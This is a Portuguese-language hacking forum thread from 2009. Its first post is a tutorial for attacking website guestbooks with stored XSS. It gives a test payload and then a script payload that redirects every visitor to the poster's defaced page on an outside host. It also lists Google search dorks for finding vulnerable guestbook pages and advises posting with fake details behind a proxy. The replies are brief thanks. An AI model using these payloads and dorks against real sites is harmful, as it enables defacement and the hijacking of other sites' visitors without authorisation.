Unconfigured Ad Widget

Collapse

Anúncio

Collapse
No announcement yet.

XSS em mural de sites

Collapse
X
 
  • Filter
  • Tempo
  • Show
Clear All
new posts

  • Font Size
    #1

    Tutorial XSS em mural de sites

    Esse medoto é velho mais funfa ,
    se tiver outro topico igual aqui podem excluir este =)

    mural é a pagina onde fica os recados dos visitantes do site.

    Apenas usuários registrados e ativados podem ver os links., Clique aqui para se cadastrar...
    " /muralderecados.php

    pode ser diversos jeitos,
    ai vai tar la pra voce postar seu recados ou comentario, ai você vai colocar uma alerta

    prencha os campos

    nome
    email

    claro que vai ser com dados falsos xD
    ai na mensagem você coloca <script>alert("textoaki")</script>
    se aparecer uma alerta com os seu texto é porque ta vul
    ai voce vai fazer para redirecionar para a sua index que esta modificada

    ai voce vai la pra postar o recado

    e coloca

    <script>window.location.href="http://myips.110mb.com/dilluvium.html";</script>

    ali ta a minha index você coloca a sua e a pagina vai passar a redirecionar para seu site =)

    para achar sites coloquei no google

    inurl:"mural.php"
    inurl:"recados.php"
    inurl:"muralderecados.php"

    Nao se esqueça do proxy

    Espero que tenham entendido , nao sou muito bom com explicações..huauhau

    Flwss
    Last edited by CzarSuvorov; 07-12-2009, 12:22.

  • Font Size
    #2
    realmente este método é antigo, mais ainda existe bastante sites vulneráveis a este tipo de ataque


    valeu pelo post
    ;D
    ~# Criado pela [IN]Segurança #~

    Comment


    • Font Size
      #3
      bom e velho xss

      vlw
      sigpic


      Gostou do meu tópico, seja um bom e educado garoto e dê Obrigado!
      MSN: thunderyuster@hotmail.com

      Comment

      X
      Working...
      X